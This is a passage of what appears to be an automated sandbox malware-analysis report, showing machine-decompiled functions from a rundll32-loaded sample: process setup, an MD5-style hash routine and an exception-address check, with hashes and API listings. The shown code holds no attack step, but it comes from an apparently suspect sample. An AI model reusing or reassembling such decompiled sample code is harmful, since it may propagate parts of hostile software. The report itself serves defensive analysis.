                                      • HeapFree.KERNEL32(00000000,?,?,?,69B25F44,00000005,?,?,69B25F44,?,?,69B25F44,?,?), ref: 04DE4A11
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.569041857.0000000004DE1000.00000020.10000000.00040000.00000000.sdmp, Offset: 04DE0000, based on PE: true
                                      • Associated: 00000003.00000002.569021916.0000000004DE0000.00000004.10000000.00040000.00000000.sdmpDownload File
                                      • Associated: 00000003.00000002.569059162.0000000004DE9000.00000002.10000000.00040000.00000000.sdmpDownload File
                                      • Associated: 00000003.00000002.569071380.0000000004DEA000.00000004.10000000.00040000.00000000.sdmpDownload File
                                      • Associated: 00000003.00000002.569085725.0000000004DEC000.00000002.10000000.00040000.00000000.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_4de0000_rundll32.jbxd
                                      Similarity
                                      • API ID: FreeHeap
                                      • String ID:
                                      • API String ID: 3298025750-0
                                      • Opcode ID: a418942d1b42206bdc842021b29572ed6fb3c3be434280d07ff55e67a92d564e
                                      • Instruction ID: fbffb1b1275eeff0a9205d32330e1372a5b6270c0a5a6e22fd013263b73fc8cd
                                      • Opcode Fuzzy Hash: a418942d1b42206bdc842021b29572ed6fb3c3be434280d07ff55e67a92d564e
                                      • Instruction Fuzzy Hash: 70816970B10206ABDB10FBBBDDD4D7F77E9EB89710B24492AA101EB304E639FD419660
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 04DE515F Relevance: 7.5, APIs: 5, Instructions: 37COMMON
                                      Download Yara Rule
                                      C-Code - Quality: 100%
                                      			E04DE515F(intOrPtr _a4) {
				void* _t2;
				unsigned int _t4;
				void* _t5;
				long _t6;
				void* _t7;
				void* _t15;

				_t2 = CreateEventA(0, 1, 0, 0);
				 *0x4dea30c = _t2;
				if(_t2 == 0) {
					return GetLastError();
				}
				_t4 = GetVersion();
				if(_t4 != 5) {
					L4:
					if(_t15 <= 0) {
						_t5 = 0x32;
						return _t5;
					}
					L5:
					 *0x4dea2fc = _t4;
					_t6 = GetCurrentProcessId();
					 *0x4dea2f8 = _t6;
					 *0x4dea304 = _a4;
					_t7 = OpenProcess(0x10047a, 0, _t6);
					 *0x4dea2f4 = _t7;
					if(_t7 == 0) {
						 *0x4dea2f4 =  *0x4dea2f4 | 0xffffffff;
					}
					return 0;
				}
				if(_t4 >> 8 > 0) {
					goto L5;
				}
				_t15 = _t4 - _t4;
				goto L4;
			}









                                      0x04de5167
                                      0x04de516d
                                      0x04de5174
                                      0x00000000
                                      0x04de51ce
                                      0x04de5176
                                      0x04de517e
                                      0x04de518b
                                      0x04de518b
                                      0x04de51cb
                                      0x00000000
                                      0x04de51cb
                                      0x04de518d
                                      0x04de518d
                                      0x04de5192
                                      0x04de51a4
                                      0x04de51a9
                                      0x04de51af
                                      0x04de51b5
                                      0x04de51bc
                                      0x04de51be
                                      0x04de51be
                                      0x00000000
                                      0x04de51c5
                                      0x04de5187
                                      0x00000000
                                      0x00000000
                                      0x04de5189
                                      0x00000000

                                      APIs
                                      • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,04DE3D54,?), ref: 04DE5167
                                      • GetVersion.KERNEL32 ref: 04DE5176
                                      • GetCurrentProcessId.KERNEL32 ref: 04DE5192
                                      • OpenProcess.KERNEL32(0010047A,00000000,00000000), ref: 04DE51AF
                                      • GetLastError.KERNEL32 ref: 04DE51CE
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.569041857.0000000004DE1000.00000020.10000000.00040000.00000000.sdmp, Offset: 04DE0000, based on PE: true
                                      • Associated: 00000003.00000002.569021916.0000000004DE0000.00000004.10000000.00040000.00000000.sdmpDownload File
                                      • Associated: 00000003.00000002.569059162.0000000004DE9000.00000002.10000000.00040000.00000000.sdmpDownload File
                                      • Associated: 00000003.00000002.569071380.0000000004DEA000.00000004.10000000.00040000.00000000.sdmpDownload File
                                      • Associated: 00000003.00000002.569085725.0000000004DEC000.00000002.10000000.00040000.00000000.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_4de0000_rundll32.jbxd
                                      Similarity
                                      • API ID: Process$CreateCurrentErrorEventLastOpenVersion
                                      • String ID:
                                      • API String ID: 2270775618-0
                                      • Opcode ID: 3db412b6ee3a6443bf845e229ebcb5574fae83ed311898bd22bc4cd7812e2f34
                                      • Instruction ID: f427f89841eaa006bba7888321c9bd1ecd7a1951bd237a13fe409df44e6fb9ae
                                      • Opcode Fuzzy Hash: 3db412b6ee3a6443bf845e229ebcb5574fae83ed311898bd22bc4cd7812e2f34
                                      • Instruction Fuzzy Hash: 6EF081B4B41303FBDB247FA3B839B243BA0E704799F104455E552EE3C0E6BAA840CB15
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 04DE198A Relevance: 1.9, APIs: 1, Instructions: 611COMMONCrypto
                                      Download Yara Rule
                                      C-Code - Quality: 49%
                                      			E04DE198A(void* __ecx, intOrPtr* _a4) {
				signed int _v8;
				signed int _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				intOrPtr _v40;
				intOrPtr _v44;
				intOrPtr _v48;
				intOrPtr _v52;
				intOrPtr _v56;
				intOrPtr _v60;
				intOrPtr _v64;
				intOrPtr _v68;
				intOrPtr _v72;
				void _v76;
				intOrPtr* _t226;
				signed int _t229;
				signed int _t231;
				signed int _t233;
				signed int _t235;
				signed int _t237;
				signed int _t239;
				signed int _t241;
				signed int _t243;
				signed int _t245;
				signed int _t247;
				signed int _t249;
				signed int _t251;
				signed int _t253;
				signed int _t255;
				signed int _t257;
				signed int _t259;
				signed int _t338;
				signed char* _t348;
				signed int _t349;
				signed int _t351;
				signed int _t353;
				signed int _t355;
				signed int _t357;
				signed int _t359;
				signed int _t361;
				signed int _t363;
				signed int _t365;
				signed int _t367;
				signed int _t376;
				signed int _t378;
				signed int _t380;
				signed int _t382;
				signed int _t384;
				intOrPtr* _t400;
				signed int* _t401;
				signed int _t402;
				signed int _t404;
				signed int _t406;
				signed int _t408;
				signed int _t410;
				signed int _t412;
				signed int _t414;
				signed int _t416;
				signed int _t418;
				signed int _t420;
				signed int _t422;
				signed int _t424;
				signed int _t432;
				signed int _t434;
				signed int _t436;
				signed int _t438;
				signed int _t440;
				signed int _t508;
				signed int _t599;
				signed int _t607;
				signed int _t613;
				signed int _t679;
				void* _t682;
				signed int _t683;
				signed int _t685;
				signed int _t690;
				signed int _t692;
				signed int _t697;
				signed int _t699;
				signed int _t718;
				signed int _t720;
				signed int _t722;
				signed int _t724;
				signed int _t726;
				signed int _t728;
				signed int _t734;
				signed int _t740;
				signed int _t742;
				signed int _t744;
				signed int _t746;
				signed int _t748;

				_t226 = _a4;
				_t348 = __ecx + 2;
				_t401 =  &_v76;
				_t682 = 0x10;
				do {
					 *_t401 = (((_t348[1] & 0x000000ff) << 0x00000008 |  *_t348 & 0x000000ff) << 0x00000008 |  *(_t348 - 1) & 0x000000ff) << 0x00000008 |  *(_t348 - 2) & 0x000000ff;
					_t401 =  &(_t401[1]);
					_t348 =  &(_t348[4]);
					_t682 = _t682 - 1;
				} while (_t682 != 0);
				_t6 = _t226 + 4; // 0x14eb3fc3
				_t683 =  *_t6;
				_t7 = _t226 + 8; // 0x8d08458b
				_t402 =  *_t7;
				_t8 = _t226 + 0xc; // 0x56c1184c
				_t349 =  *_t8;
				asm("rol eax, 0x7");
				_t229 = ( !_t683 & _t349 | _t402 & _t683) + _v76 +  *_t226 - 0x28955b88 + _t683;
				asm("rol ecx, 0xc");
				_t351 = ( !_t229 & _t402 | _t683 & _t229) + _v72 + _t349 - 0x173848aa + _t229;
				asm("ror edx, 0xf");
				_t404 = ( !_t351 & _t683 | _t351 & _t229) + _v68 + _t402 + 0x242070db + _t351;
				asm("ror esi, 0xa");
				_t685 = ( !_t404 & _t229 | _t351 & _t404) + _v64 + _t683 - 0x3e423112 + _t404;
				_v8 = _t685;
				_t690 = _v8;
				asm("rol eax, 0x7");
				_t231 = ( !_t685 & _t351 | _t404 & _v8) + _v60 + _t229 - 0xa83f051 + _t690;
				asm("rol ecx, 0xc");
				_t353 = ( !_t231 & _t404 | _t690 & _t231) + _v56 + _t351 + 0x4787c62a + _t231;
				asm("ror edx, 0xf");
				_t406 = ( !_t353 & _t690 | _t353 & _t231) + _v52 + _t404 - 0x57cfb9ed + _t353;
				asm("ror esi, 0xa");
				_t692 = ( !_t406 & _t231 | _t353 & _t406) + _v48 + _t690 - 0x2b96aff + _t406;
				_v8 = _t692;
				_t697 = _v8;
				asm("rol eax, 0x7");
				_t233 = ( !_t692 & _t353 | _t406 & _v8) + _v44 + _t231 + 0x698098d8 + _t697;
				asm("rol ecx, 0xc");
				_t355 = ( !_t233 & _t406 | _t697 & _t233) + _v40 + _t353 - 0x74bb0851 + _t233;
				asm("ror edx, 0xf");
				_t408 = ( !_t355 & _t697 | _t355 & _t233) + _v36 + _t406 - 0xa44f + _t355;
				asm("ror esi, 0xa");
				_t699 = ( !_t408 & _t233 | _t355 & _t408) + _v32 + _t697 - 0x76a32842 + _t408;
				_v8 = _t699;
				asm("rol eax, 0x7");
				_t235 = ( !_t699 & _t355 | _t408 & _v8) + _v28 + _t233 + 0x6b901122 + _v8;
				asm("rol ecx, 0xc");
				_t357 = ( !_t235 & _t408 | _v8 & _t235) + _v24 + _t355 - 0x2678e6d + _t235;
				_t508 =  !_t357;
				asm("ror edx, 0xf");
				_t410 = (_t508 & _v8 | _t357 & _t235) + _v20 + _t408 - 0x5986bc72 + _t357;
				_v12 = _t410;
				_v12 =  !_v12;
				asm("ror esi, 0xa");
				_t718 = (_v12 & _t235 | _t357 & _t410) + _v16 + _v8 + 0x49b40821 + _t410;
				asm("rol eax, 0x5");
				_t237 = (_t508 & _t410 | _t357 & _t718) + _v72 + _t235 - 0x9e1da9e + _t718;
				asm("rol ecx, 0x9");
				_t359 = (_v12 & _t718 | _t410 & _t237) + _v52 + _t357 - 0x3fbf4cc0 + _t237;
				asm("rol edx, 0xe");
				_t412 = ( !_t718 & _t237 | _t359 & _t718) + _v32 + _t410 + 0x265e5a51 + _t359;
				asm("ror esi, 0xc");
				_t720 = ( !_t237 & _t359 | _t412 & _t237) + _v76 + _t718 - 0x16493856 + _t412;
				asm("rol eax, 0x5");
				_t239 = ( !_t359 & _t412 | _t359 & _t720) + _v56 + _t237 - 0x29d0efa3 + _t720;
				asm("rol ecx, 0x9");
				_t361 = ( !_t412 & _t720 | _t412 & _t239) + _v36 + _t359 + 0x2441453 + _t239;
				asm("rol edx, 0xe");
				_t414 = ( !_t720 & _t239 | _t361 & _t720) + _v16 + _t412 - 0x275e197f + _t361;
				asm("ror esi, 0xc");
				_t722 = ( !_t239 & _t361 | _t414 & _t239) + _v60 + _t720 - 0x182c0438 + _t414;
				asm("rol eax, 0x5");
				_t241 = ( !_t361 & _t414 | _t361 & _t722) + _v40 + _t239 + 0x21e1cde6 + _t722;
				asm("rol ecx, 0x9");
				_t363 = ( !_t414 & _t722 | _t414 & _t241) + _v20 + _t361 - 0x3cc8f82a + _t241;
				asm("rol edx, 0xe");
				_t416 = ( !_t722 & _t241 | _t363 & _t722) + _v64 + _t414 - 0xb2af279 + _t363;
				asm("ror esi, 0xc");
				_t724 = ( !_t241 & _t363 | _t416 & _t241) + _v44 + _t722 + 0x455a14ed + _t416;
				asm("rol eax, 0x5");
				_t243 = ( !_t363 & _t416 | _t363 & _t724) + _v24 + _t241 - 0x561c16fb + _t724;
				asm("rol ecx, 0x9");
				_t365 = ( !_t416 & _t724 | _t416 & _t243) + _v68 + _t363 - 0x3105c08 + _t243;
				asm("rol edx, 0xe");
				_t418 = ( !_t724 & _t243 | _t365 & _t724) + _v48 + _t416 + 0x676f02d9 + _t365;
				asm("ror esi, 0xc");
				_t726 = ( !_t243 & _t365 | _t418 & _t243) + _v28 + _t724 - 0x72d5b376 + _t418;
				asm("rol eax, 0x4");
				_t245 = (_t365 ^ _t418 ^ _t726) + _v56 + _t243 - 0x5c6be + _t726;
				asm("rol ecx, 0xb");
				_t367 = (_t418 ^ _t726 ^ _t245) + _v44 + _t365 - 0x788e097f + _t245;
				asm("rol edx, 0x10");
				_t420 = (_t367 ^ _t726 ^ _t245) + _v32 + _t418 + 0x6d9d6122 + _t367;
				_t599 = _t367 ^ _t420;
				asm("ror esi, 0x9");
				_t728 = (_t599 ^ _t245) + _v20 + _t726 - 0x21ac7f4 + _t420;
				asm("rol eax, 0x4");
				_t247 = (_t599 ^ _t728) + _v72 + _t245 - 0x5b4115bc + _t728;
				asm("rol edi, 0xb");
				_t607 = (_t420 ^ _t728 ^ _t247) + _v60 + _t367 + 0x4bdecfa9 + _t247;
				asm("rol edx, 0x10");
				_t422 = (_t607 ^ _t728 ^ _t247) + _v48 + _t420 - 0x944b4a0 + _t607;
				_t338 = _t607 ^ _t422;
				asm("ror ecx, 0x9");
				_t376 = (_t338 ^ _t247) + _v36 + _t728 - 0x41404390 + _t422;
				asm("rol eax, 0x4");
				_t249 = (_t338 ^ _t376) + _v24 + _t247 + 0x289b7ec6 + _t376;
				asm("rol esi, 0xb");
				_t734 = (_t422 ^ _t376 ^ _t249) + _v76 + _t607 - 0x155ed806 + _t249;
				asm("rol edi, 0x10");
				_t613 = (_t734 ^ _t376 ^ _t249) + _v64 + _t422 - 0x2b10cf7b + _t734;
				_t424 = _t734 ^ _t613;
				asm("ror ecx, 0x9");
				_t378 = (_t424 ^ _t249) + _v52 + _t376 + 0x4881d05 + _t613;
				asm("rol eax, 0x4");
				_t251 = (_t424 ^ _t378) + _v40 + _t249 - 0x262b2fc7 + _t378;
				asm("rol edx, 0xb");
				_t432 = (_t613 ^ _t378 ^ _t251) + _v28 + _t734 - 0x1924661b + _t251;
				asm("rol esi, 0x10");
				_t740 = (_t432 ^ _t378 ^ _t251) + _v16 + _t613 + 0x1fa27cf8 + _t432;
				asm("ror ecx, 0x9");
				_t380 = (_t432 ^ _t740 ^ _t251) + _v68 + _t378 - 0x3b53a99b + _t740;
				asm("rol eax, 0x6");
				_t253 = (( !_t432 | _t380) ^ _t740) + _v76 + _t251 - 0xbd6ddbc + _t380;
				asm("rol edx, 0xa");
				_t434 = (( !_t740 | _t253) ^ _t380) + _v48 + _t432 + 0x432aff97 + _t253;
				asm("rol esi, 0xf");
				_t742 = (( !_t380 | _t434) ^ _t253) + _v20 + _t740 - 0x546bdc59 + _t434;
				asm("ror ecx, 0xb");
				_t382 = (( !_t253 | _t742) ^ _t434) + _v56 + _t380 - 0x36c5fc7 + _t742;
				asm("rol eax, 0x6");
				_t255 = (( !_t434 | _t382) ^ _t742) + _v28 + _t253 + 0x655b59c3 + _t382;
				asm("rol edx, 0xa");
				_t436 = (( !_t742 | _t255) ^ _t382) + _v64 + _t434 - 0x70f3336e + _t255;
				asm("rol esi, 0xf");
				_t744 = (( !_t382 | _t436) ^ _t255) + _v36 + _t742 - 0x100b83 + _t436;
				asm("ror ecx, 0xb");
				_t384 = (( !_t255 | _t744) ^ _t436) + _v72 + _t382 - 0x7a7ba22f + _t744;
				asm("rol eax, 0x6");
				_t257 = (( !_t436 | _t384) ^ _t744) + _v44 + _t255 + 0x6fa87e4f + _t384;
				asm("rol edx, 0xa");
				_t438 = (( !_t744 | _t257) ^ _t384) + _v16 + _t436 - 0x1d31920 + _t257;
				asm("rol esi, 0xf");
				_t746 = (( !_t384 | _t438) ^ _t257) + _v52 + _t744 - 0x5cfebcec + _t438;
				asm("ror edi, 0xb");
				_t679 = (( !_t257 | _t746) ^ _t438) + _v24 + _t384 + 0x4e0811a1 + _t746;
				asm("rol eax, 0x6");
				_t259 = (( !_t438 | _t679) ^ _t746) + _v60 + _t257 - 0x8ac817e + _t679;
				asm("rol edx, 0xa");
				_t440 = (( !_t746 | _t259) ^ _t679) + _v32 + _t438 - 0x42c50dcb + _t259;
				_t400 = _a4;
				asm("rol esi, 0xf");
				_t748 = (( !_t679 | _t440) ^ _t259) + _v68 + _t746 + 0x2ad7d2bb + _t440;
				 *_t400 =  *_t400 + _t259;
				asm("ror eax, 0xb");
				 *((intOrPtr*)(_t400 + 4)) = (( !_t259 | _t748) ^ _t440) + _v40 + _t679 - 0x14792c6f +  *((intOrPtr*)(_t400 + 4)) + _t748;
				 *((intOrPtr*)(_t400 + 8)) =  *((intOrPtr*)(_t400 + 8)) + _t748;
				 *((intOrPtr*)(_t400 + 0xc)) =  *((intOrPtr*)(_t400 + 0xc)) + _t440;
				return memset( &_v76, 0, 0x40);
			}


































































































                                      0x04de198d
                                      0x04de1998
                                      0x04de199b
                                      0x04de199e
                                      0x04de199f
                                      0x04de19bd
                                      0x04de19bf
                                      0x04de19c2
                                      0x04de19c5
                                      0x04de19c5
                                      0x04de19c8
                                      0x04de19c8
                                      0x04de19cb
                                      0x04de19cb
                                      0x04de19ce
                                      0x04de19ce
                                      0x04de19eb
                                      0x04de19ee
                                      0x04de1a04
                                      0x04de1a07
                                      0x04de1a21
                                      0x04de1a24
                                      0x04de1a3a
                                      0x04de1a3d
                                      0x04de1a3f
                                      0x04de1a57
                                      0x04de1a5a
                                      0x04de1a5d
                                      0x04de1a75
                                      0x04de1a78
                                      0x04de1a92
                                      0x04de1a95
                                      0x04de1aab
                                      0x04de1aae
                                      0x04de1ab0
                                      0x04de1ac8
                                      0x04de1acd
                                      0x04de1ad0
                                      0x04de1ae6
                                      0x04de1ae9
                                      0x04de1b03
                                      0x04de1b06
                                      0x04de1b1c
                                      0x04de1b1f
                                      0x04de1b21
                                      0x04de1b3c
                                      0x04de1b3f
                                      0x04de1b56
                                      0x04de1b59
                                      0x04de1b5d
                                      0x04de1b76
                                      0x04de1b79
                                      0x04de1b7b
                                      0x04de1b7e
                                      0x04de1b99
                                      0x04de1b9c
                                      0x04de1bb5
                                      0x04de1bb8
                                      0x04de1bc8
                                      0x04de1bcb
                                      0x04de1be3
                                      0x04de1be6
                                      0x04de1c00
                                      0x04de1c03
                                      0x04de1c1b
                                      0x04de1c1e
                                      0x04de1c34
                                      0x04de1c37
                                      0x04de1c4f
                                      0x04de1c52
                                      0x04de1c6a
                                      0x04de1c6d
                                      0x04de1c87
                                      0x04de1c8a
                                      0x04de1ca0
                                      0x04de1ca3
                                      0x04de1cbb
                                      0x04de1cbe
                                      0x04de1cd8
                                      0x04de1cdb
                                      0x04de1cf3
                                      0x04de1cf6
                                      0x04de1d0c
                                      0x04de1d0f
                                      0x04de1d27
                                      0x04de1d2a
                                      0x04de1d42
                                      0x04de1d45
                                      0x04de1d57
                                      0x04de1d5a
                                      0x04de1d6c
                                      0x04de1d6f
                                      0x04de1d81
                                      0x04de1d84
                                      0x04de1d88
                                      0x04de1d98
                                      0x04de1d9b
                                      0x04de1da9
                                      0x04de1dac
                                      0x04de1dbe
                                      0x04de1dc1
                                      0x04de1dd5
                                      0x04de1dd8
                                      0x04de1dda
                                      0x04de1dea
                                      0x04de1ded
                                      0x04de1dff
                                      0x04de1e02
                                      0x04de1e10
                                      0x04de1e13
                                      0x04de1e25
                                      0x04de1e28
                                      0x04de1e2c
                                      0x04de1e3c
                                      0x04de1e3f
                                      0x04de1e51
                                      0x04de1e54
                                      0x04de1e62
                                      0x04de1e65
                                      0x04de1e77
                                      0x04de1e7a
                                      0x04de1e8c
                                      0x04de1e8f
                                      0x04de1ea3
                                      0x04de1ea6
                                      0x04de1eba
                                      0x04de1ebd
                                      0x04de1ed1
                                      0x04de1ed4
                                      0x04de1ee8
                                      0x04de1eeb
                                      0x04de1eff
                                      0x04de1f02
                                      0x04de1f16
                                      0x04de1f1b
                                      0x04de1f2d
                                      0x04de1f30
                                      0x04de1f44
                                      0x04de1f47
                                      0x04de1f5b
                                      0x04de1f5e
                                      0x04de1f74
                                      0x04de1f77
                                      0x04de1f8b
                                      0x04de1f8e
                                      0x04de1fa0
                                      0x04de1fa3
                                      0x04de1fb7
                                      0x04de1fba
                                      0x04de1fce
                                      0x04de1fd1
                                      0x04de1fe5
                                      0x04de1fee
                                      0x04de1ff1
                                      0x04de1ffa
                                      0x04de2003
                                      0x04de200b
                                      0x04de2013
                                      0x04de201d
                                      0x04de2032

                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.569041857.0000000004DE1000.00000020.10000000.00040000.00000000.sdmp, Offset: 04DE0000, based on PE: true
                                      • Associated: 00000003.00000002.569021916.0000000004DE0000.00000004.10000000.00040000.00000000.sdmpDownload File
                                      • Associated: 00000003.00000002.569059162.0000000004DE9000.00000002.10000000.00040000.00000000.sdmpDownload File
                                      • Associated: 00000003.00000002.569071380.0000000004DEA000.00000004.10000000.00040000.00000000.sdmpDownload File
                                      • Associated: 00000003.00000002.569085725.0000000004DEC000.00000002.10000000.00040000.00000000.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_4de0000_rundll32.jbxd
                                      Similarity
                                      • API ID: memset
                                      • String ID:
                                      • API String ID: 2221118986-0
                                      • Opcode ID: 668d1cf50dd3503a056f93744feca511f7f68e9204d6a8be59307995ef794564
                                      • Instruction ID: b188ac7a3da38aa4b446578b9e7ce6689be36518c61c3911b2778b483d50ebf1
                                      • Opcode Fuzzy Hash: 668d1cf50dd3503a056f93744feca511f7f68e9204d6a8be59307995ef794564
                                      • Instruction Fuzzy Hash: CD22847BE516169BDB08CA95CC805E9B3E3BBC832471F9179C919E3305EE797A0786C0
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 04DE8441 Relevance: 1.7, APIs: 1, Instructions: 195nativeCOMMON
                                      Download Yara Rule
                                      C-Code - Quality: 100%
                                      			E04DE8441(long _a4) {
				intOrPtr _v8;
				intOrPtr _v12;
				signed int _v16;
				short* _v32;
				void _v36;
				void* _t57;
				signed int _t58;
				signed int _t61;
				signed int _t62;
				void* _t63;
				signed int* _t68;
				intOrPtr* _t69;
				intOrPtr* _t71;
				intOrPtr _t72;
				intOrPtr _t75;
				void* _t76;
				signed int _t77;
				void* _t78;
				void _t80;
				signed int _t81;
				signed int _t84;
				signed int _t86;
				short* _t87;
				void* _t89;
				signed int* _t90;
				long _t91;
				signed int _t93;
				signed int _t94;
				signed int _t100;
				signed int _t102;
				void* _t104;
				long _t108;
				signed int _t110;

				_t108 = _a4;
				_t76 =  *(_t108 + 8);
				if((_t76 & 0x00000003) != 0) {
					L3:
					return 0;
				}
				_a4 =  *[fs:0x4];
				_v8 =  *[fs:0x8];
				if(_t76 < _v8 || _t76 >= _a4) {
					_t102 =  *(_t108 + 0xc);
					__eflags = _t102 - 0xffffffff;
					if(_t102 != 0xffffffff) {
						_t91 = 0;
						__eflags = 0;
						_a4 = 0;
						_t57 = _t76;
						do {
							_t80 =  *_t57;
							__eflags = _t80 - 0xffffffff;
							if(_t80 == 0xffffffff) {
								goto L9;
							}
							__eflags = _t80 - _t91;
							if(_t80 >= _t91) {
								L20:
								_t63 = 0;
								L60:
								return _t63;
							}
							L9:
							__eflags =  *(_t57 + 4);
							if( *(_t57 + 4) != 0) {
								_t12 =  &_a4;
								 *_t12 = _a4 + 1;
								__eflags =  *_t12;
							}
							_t91 = _t91 + 1;
							_t57 = _t57 + 0xc;
							__eflags = _t91 - _t102;
						} while (_t91 <= _t102);
						__eflags = _a4;
						if(_a4 == 0) {
							L15:
							_t81 =  *0x4dea380; // 0x0
							_t110 = _t76 & 0xfffff000;
							_t58 = 0;
							__eflags = _t81;
							if(_t81 <= 0) {
								L18:
								_t104 = _t102 | 0xffffffff;
								_t61 = NtQueryVirtualMemory(_t104, _t76, 0,  &_v36, 0x1c,  &_a4);
								__eflags = _t61;
								if(_t61 < 0) {
									_t62 = 0;
									__eflags = 0;
								} else {
									_t62 = _a4;
								}
								__eflags = _t62;
								if(_t62 == 0) {
									L59:
									_t63 = _t104;
									goto L60;
								} else {
									__eflags = _v12 - 0x1000000;
									if(_v12 != 0x1000000) {
										goto L59;
									}
									__eflags = _v16 & 0x000000cc;
									if((_v16 & 0x000000cc) == 0) {
										L46:
										_t63 = 1;
										 *0x4dea3c8 = 1;
										__eflags =  *0x4dea3c8;
										if( *0x4dea3c8 != 0) {
											goto L60;
										}
										_t84 =  *0x4dea380; // 0x0
										__eflags = _t84;
										_t93 = _t84;
										if(_t84 <= 0) {
											L51:
											__eflags = _t93;
											if(_t93 != 0) {
												L58:
												 *0x4dea3c8 = 0;
												goto L5;
											}
											_t77 = 0xf;
											__eflags = _t84 - _t77;
											if(_t84 <= _t77) {
												_t77 = _t84;
											}
											_t94 = 0;
											__eflags = _t77;
											if(_t77 < 0) {
												L56:
												__eflags = _t84 - 0x10;
												if(_t84 < 0x10) {
													_t86 = _t84 + 1;
													__eflags = _t86;
													 *0x4dea380 = _t86;
												}
												goto L58;
											} else {
												do {
													_t68 = 0x4dea388 + _t94 * 4;
													_t94 = _t94 + 1;
													__eflags = _t94 - _t77;
													 *_t68 = _t110;
													_t110 =  *_t68;
												} while (_t94 <= _t77);
												goto L56;
											}
										}
										_t69 = 0x4dea384 + _t84 * 4;
										while(1) {
											__eflags =  *_t69 - _t110;
											if( *_t69 == _t110) {
												goto L51;
											}
											_t93 = _t93 - 1;
											_t69 = _t69 - 4;
											__eflags = _t93;
											if(_t93 > 0) {
												continue;
											}
											goto L51;
										}
										goto L51;
									}
									_t87 = _v32;
									__eflags =  *_t87 - 0x5a4d;
									if( *_t87 != 0x5a4d) {
										goto L59;
									}
									_t71 =  *((intOrPtr*)(_t87 + 0x3c)) + _t87;
									__eflags =  *_t71 - 0x4550;
									if( *_t71 != 0x4550) {
										goto L59;
									}
									__eflags =  *((short*)(_t71 + 0x18)) - 0x10b;
									if( *((short*)(_t71 + 0x18)) != 0x10b) {
										goto L59;
									}
									_t78 = _t76 - _t87;
									__eflags =  *((short*)(_t71 + 6));
									_t89 = ( *(_t71 + 0x14) & 0x0000ffff) + _t71 + 0x18;
									if( *((short*)(_t71 + 6)) <= 0) {
										goto L59;
									}
									_t72 =  *((intOrPtr*)(_t89 + 0xc));
									__eflags = _t78 - _t72;
									if(_t78 < _t72) {
										goto L46;
									}
									__eflags = _t78 -  *((intOrPtr*)(_t89 + 8)) + _t72;
									if(_t78 >=  *((intOrPtr*)(_t89 + 8)) + _t72) {
										goto L46;
									}
									__eflags =  *(_t89 + 0x27) & 0x00000080;
									if(( *(_t89 + 0x27) & 0x00000080) != 0) {
										goto L20;
									}
									goto L46;
								}
							} else {
								goto L16;
							}
							while(1) {
								L16:
								__eflags =  *((intOrPtr*)(0x4dea388 + _t58 * 4)) - _t110;
								if( *((intOrPtr*)(0x4dea388 + _t58 * 4)) == _t110) {
									break;
								}
								_t58 = _t58 + 1;
								__eflags = _t58 - _t81;
								if(_t58 < _t81) {
									continue;
								}
								goto L18;
							}
							__eflags = _t58;
							if(_t58 <= 0) {
								goto L5;
							}
							 *0x4dea3c8 = 1;
							__eflags =  *0x4dea3c8;
							if( *0x4dea3c8 != 0) {
								goto L5;
							}
							__eflags =  *((intOrPtr*)(0x4dea388 + _t58 * 4)) - _t110;
							if( *((intOrPtr*)(0x4dea388 + _t58 * 4)) == _t110) {
								L32:
								_t100 = 0;
								__eflags = _t58;
								if(_t58 < 0) {
									L34:
									 *0x4dea3c8 = 0;
									goto L5;
								} else {
									goto L33;
								}
								do {
									L33:
									_t90 = 0x4dea388 + _t100 * 4;
									_t100 = _t100 + 1;
									__eflags = _t100 - _t58;
									 *_t90 = _t110;
									_t110 =  *_t90;
								} while (_t100 <= _t58);
								goto L34;
							}
							_t25 = _t81 - 1; // -1
							_t58 = _t25;
							__eflags = _t58;
							if(_t58 < 0) {
								L28:
								__eflags = _t81 - 0x10;
								if(_t81 < 0x10) {
									_t81 = _t81 + 1;
									__eflags = _t81;
									 *0x4dea380 = _t81;
								}
								_t28 = _t81 - 1; // 0x0
								_t58 = _t28;
								goto L32;
							} else {
								goto L25;
							}
							while(1) {
								L25:
								__eflags =  *((intOrPtr*)(0x4dea388 + _t58 * 4)) - _t110;
								if( *((intOrPtr*)(0x4dea388 + _t58 * 4)) == _t110) {
									break;
								}
								_t58 = _t58 - 1;
								__eflags = _t58;
								if(_t58 >= 0) {
									continue;
								}
								break;
							}
							__eflags = _t58;
							if(__eflags >= 0) {
								if(__eflags == 0) {
									goto L34;
								}
								goto L32;
							}
							goto L28;
						}
						_t75 =  *((intOrPtr*)(_t108 - 8));
						__eflags = _t75 - _v8;
						if(_t75 < _v8) {
							goto L20;
						}
						__eflags = _t75 - _t108;
						if(_t75 >= _t108) {
							goto L20;
						}
						goto L15;
					}
					L5:
					_t63 = 1;
					goto L60;
				} else {
					goto L3;
				}
			}




































                                      0x04de844b
                                      0x04de844e
                                      0x04de8454
                                      0x04de8472
                                      0x00000000
                                      0x04de8472
                                      0x04de845c
                                      0x04de8465
                                      0x04de846b
                                      0x04de847a
                                      0x04de847d
                                      0x04de8480
                                      0x04de848a
                                      0x04de848a
                                      0x04de848c
                                      0x04de848f
                                      0x04de8491
                                      0x04de8491
                                      0x04de8493
                                      0x04de8496
                                      0x00000000
                                      0x00000000
                                      0x04de8498
                                      0x04de849a
                                      0x04de8500
                                      0x04de8500
                                      0x04de865e
                                      0x00000000
                                      0x04de865e
                                      0x04de849c
                                      0x04de849c
                                      0x04de84a0
                                      0x04de84a2
                                      0x04de84a2
                                      0x04de84a2
                                      0x04de84a2
                                      0x04de84a5
                                      0x04de84a6
                                      0x04de84a9
                                      0x04de84a9
                                      0x04de84ad
                                      0x04de84b1
                                      0x04de84bf
                                      0x04de84bf
                                      0x04de84c7
                                      0x04de84cd
                                      0x04de84cf
                                      0x04de84d1
                                      0x04de84e1
                                      0x04de84ee
                                      0x04de84f2
                                      0x04de84f7
